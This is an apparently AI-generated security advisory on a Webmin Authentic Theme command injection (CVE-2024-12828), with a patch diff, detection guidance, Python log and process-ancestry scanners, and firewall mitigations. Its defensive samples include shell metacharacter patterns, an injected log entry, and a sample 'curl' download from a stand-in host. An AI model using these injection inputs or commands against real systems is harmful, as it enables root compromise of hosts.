CVE-2024-12828 Overview
CVE-2024-12828 is a command injection vulnerability in Webmin that allows authenticated remote attackers to execute arbitrary code as root. The flaw resides in the handling of CGI requests within the Authentic Theme component. Webmin fails to properly validate a user-supplied string before passing it to a system call, enabling shell command injection [CWE-78]. The Zero Day Initiative tracked this issue as ZDI-CAN-22346 and published advisory ZDI-24-1725. Webmin version 2.104 is confirmed affected.
Critical Impact
Authenticated attackers can achieve root-level remote code execution on affected Webmin installations, gaining full control of the underlying Linux or Unix host.
Affected Products
- Webmin 2.104
- Webmin Authentic Theme (vulnerable authentic-lib.pl autocomplete handler)
- Webmin deployments exposing the management interface over the network
Discovery Timeline
- 2024-12-30 - CVE-2024-12828 published to NVD
- 2025-08-14 - Last updated in NVD database
Technical Details for CVE-2024-12828
Vulnerability Analysis
The vulnerability is an OS command injection flaw [CWE-78] in Webmin's CGI request handling. When the Authentic Theme processes the xhr-get_autocompletes request, it passes user-controlled parameters to a function that ultimately invokes a system shell call. Because the input string is not sanitized or escaped, an attacker who supplies crafted shell metacharacters can break out of the intended argument context. The resulting command executes with the privileges of the Webmin process, which typically runs as root. Successful exploitation grants the attacker arbitrary command execution on the host.
Exploitation requires valid authentication to the Webmin interface, which limits opportunistic attacks but does not prevent abuse by low-privileged users, compromised accounts, or attackers who have obtained credentials through phishing or credential reuse. The EPSS score of 21.7% places this CVE in the 95th percentile, indicating elevated likelihood of exploitation activity relative to the broader CVE population.
Root Cause
The root cause is missing input validation in the autocomplete handler within authentic-lib.pl. The get_autocomplete_shell function processed xhr-get_autocomplete_type and xhr-get_autocomplete_string parameters and used them to execute a system call without first dropping privileges or sanitizing shell metacharacters.
Attack Vector
An authenticated attacker sends a crafted HTTP request to the Webmin CGI endpoint that handles autocomplete queries. By injecting shell metacharacters such as backticks, semicolons, or command substitution syntax into the autocomplete parameters, the attacker forces the server to execute attacker-controlled commands as root.
# Security patch in authentic-lib.pl - adds privilege drop before autocomplete execution
flush_file_lines($file);
print convert_to_json($history);
} elsif ($in{'xhr-get_autocompletes'} eq '1') {
+ switch_to_remote_user_safe();
my @data =
get_autocomplete_shell($in{'xhr-get_autocomplete_type'}, $in{'xhr-get_autocomplete_string'});
print convert_to_json(\@data);
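Review bot: the added switch_to_remote_user_safe() call only limits the blast radius (get_autocomplete_shell now runs as the authenticated remote user instead of root); nothing in this hunk validates or escapes $in{'xhr-get_autocomplete_type'} or $in{'xhr-get_autocomplete_string'} before they reach the shell, so the injection itself remains. Consider restricting the type parameter to an allowlist of known autocomplete kinds and passing the string without shell interpretation (Perl's list-form system/exec, or quotemeta on the value), so the fix does not rest on the privilege drop alone.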
Source: Webmin Authentic Theme commit 61e5b10. The patch introduces a call to switch_to_remote_user_safe() before invoking get_autocomplete_shell, ensuring the shell command runs under the authenticated user's context rather than as root.
Detection Methods for CVE-2024-12828
Indicators of Compromise
- HTTP POST requests to Webmin endpoints containing xhr-get_autocompletes=1 accompanied by shell metacharacters (;, |, `, $()) in xhr-get_autocomplete_type or xhr-get_autocomplete_string parameters.
- Unexpected child processes spawned by the miniserv.pl Webmin daemon, such as sh, bash, curl, wget, or nc.
- New cron entries, SSH keys, or user accounts created shortly after Webmin authentication events.
Detection Strategies
- Inspect Webmin access logs at /var/webmin/miniserv.log for autocomplete requests containing non-alphanumeric payloads.
- Monitor process ancestry on Webmin hosts to identify shell invocations descending from the Webmin Perl process.
- Correlate authentication events with subsequent process creation to flag command-injection patterns following legitimate logins.
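A small log scanner for the first two strategies above, as an added example and not part of the original page. It assumes miniserv.log uses its usual CLF-style request line and that the autocomplete parameters are visible in the query string; POST bodies are not written to the access log, so this check must be paired with the process-ancestry monitoring described above. The sample lines are constructed.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Request-line parser for the CLF-style layout miniserv.log uses
# (assumption: the access log records the query string, not POST bodies).
CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
SHELL_META = set(';|&`$()<>\n')
AUTOCOMPLETE_PARAMS = ("xhr-get_autocomplete_type", "xhr-get_autocomplete_string")

# Constructed sample lines: one benign path autocomplete, one carrying
# a ';' in the string parameter, one unrelated page load.
SAMPLE_LOG = """\
10.0.0.5 - admin [02/Jan/2025:10:00:01 +0000] "GET /xhr.cgi?xhr-get_autocompletes=1&xhr-get_autocomplete_type=path&xhr-get_autocomplete_string=%2Fetc%2Fho HTTP/1.1" 200 512
10.0.0.9 - admin [02/Jan/2025:10:00:07 +0000] "GET /xhr.cgi?xhr-get_autocompletes=1&xhr-get_autocomplete_type=path&xhr-get_autocomplete_string=%2Ftmp%3Becho%20x HTTP/1.1" 200 0
10.0.0.9 - admin [02/Jan/2025:10:00:09 +0000] "GET /index.cgi HTTP/1.1" 200 9001
"""

def scan_miniserv_log(log_text):
    """Return one alert dict per autocomplete parameter that carries shell
    metacharacters in a request with xhr-get_autocompletes=1."""
    alerts = []
    for line in log_text.splitlines():
        m = CLF_RE.match(line)
        if not m:
            continue
        # parse_qs percent-decodes values, so %3B becomes ';' before the check
        qs = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
        if qs.get("xhr-get_autocompletes", [""])[0] != "1":
            continue
        for param in AUTOCOMPLETE_PARAMS:
            for value in qs.get(param, []):
                hits = sorted(SHELL_META & set(value))
                if hits:
                    alerts.append({"ip": m["ip"], "user": m["user"], "ts": m["ts"],
                                   "param": param, "value": value, "metachars": hits})
    return alerts

if __name__ == "__main__":
    for a in scan_miniserv_log(SAMPLE_LOG):
        print(f"{a['ts']} {a['ip']} {a['user']} {a['param']}={a['value']!r} metachars={a['metachars']}")
```

Legitimate path autocompletes contain slashes and spaces but not the characters in SHELL_META, so the metacharacter set rather than a blanket non-alphanumeric test keeps false positives down.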
Monitoring Recommendations
- Forward Webmin web logs and Linux audit logs to a centralized SIEM for cross-source correlation.
- Alert on outbound network connections initiated by child processes of miniserv.pl.
- Track file integrity on /etc/passwd, /etc/shadow, ~/.ssh/authorized_keys, and crontabs on Webmin servers.
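A process-ancestry check for the alerting recommendation above, as an added example that is not part of the original page. It walks a constructed process-table snapshot (the shape `ps -eo pid,ppid,args` or an EDR feed would give) and reports suspect children whose ancestor chain contains miniserv.pl; the pids, paths and the 203.0.113.7 address are constructed.

```python
import os

# Constructed process-table snapshot: (pid, ppid, argv) rows.
PROCESS_TABLE = [
    (1, 0, "/sbin/init"),
    (812, 1, "/usr/bin/perl /usr/share/webmin/miniserv.pl /etc/webmin/miniserv.conf"),
    (4410, 812, "/usr/bin/perl /usr/share/webmin/miniserv.pl /etc/webmin/miniserv.conf"),
    (4422, 4410, "sh -c ls /tmp"),
    (4423, 4422, "curl http://203.0.113.7/x"),
    (900, 1, "sshd: root@pts/0"),
    (905, 900, "-bash"),
]
# Child process names called out as indicators on this page.
SUSPECT_CHILDREN = {"sh", "bash", "curl", "wget", "nc"}

def find_shells_under_miniserv(table, suspects=SUSPECT_CHILDREN):
    """Return [(pid, [ancestor pids up to and including the miniserv.pl process])]
    for every suspect process that descends from the Webmin daemon."""
    by_pid = {pid: (ppid, args) for pid, ppid, args in table}
    findings = []
    for pid, (ppid, args) in by_pid.items():
        parts = args.split()
        if not parts:
            continue
        # strip the login-shell '-' prefix and any directory component
        name = os.path.basename(parts[0]).lstrip("-")
        if name not in suspects:
            continue
        chain, cur = [], ppid
        while cur in by_pid:
            chain.append(cur)
            if "miniserv.pl" in by_pid[cur][1]:
                findings.append((pid, chain))
                break
            cur = by_pid[cur][0]
    return findings

if __name__ == "__main__":
    for pid, chain in find_shells_under_miniserv(PROCESS_TABLE):
        print(f"pid {pid} descends from miniserv.pl via {chain}")
```

Webmin modules such as Command Shell spawn shells legitimately, so baseline normal child processes first and weight alerts toward network tools (curl, wget, nc) and shells that follow an autocomplete request.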
How to Mitigate CVE-2024-12828
Immediate Actions Required
- Upgrade Webmin to a version later than 2.104 that includes the Authentic Theme patch from commit 61e5b10.
- Restrict access to the Webmin management interface (default TCP port 10000) to trusted administrative networks only.
- Audit Webmin user accounts and rotate credentials for any account that may have been used by untrusted parties.
Patch Information
The fix is delivered in the Authentic Theme via commit 61e5b10227b50407e3c6ac494ffbd4385d1b59df, which adds a switch_to_remote_user_safe() call before the autocomplete shell invocation. Additional details are available in the Zero Day Initiative Advisory ZDI-24-1725.
Workarounds
- Place the Webmin interface behind a VPN or IP allowlist to eliminate exposure to untrusted networks.
- Disable or restrict the autocomplete functionality in the Authentic Theme until patches can be applied.
- Enforce strong, unique credentials and multi-factor authentication on all Webmin accounts to reduce the risk of authenticated exploitation.
# Configuration example - restrict Webmin access via iptables to a trusted management subnet
# Rules are matched in order: -A appends, so confirm no earlier rule already accepts port 10000,
# and persist the result with your distribution's iptables-save mechanism so it survives a reboot.
iptables -A INPUT -p tcp --dport 10000 -s 10.0.0.0/24 -j ACCEPT
iptables -A INPUT -p tcp --dport 10000 -j DROP
# Verify that the patched Authentic Theme is installed: the privilege-drop call should be present
grep -R "switch_to_remote_user_safe" /usr/share/webmin/authentic-theme/authentic-lib.pl
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.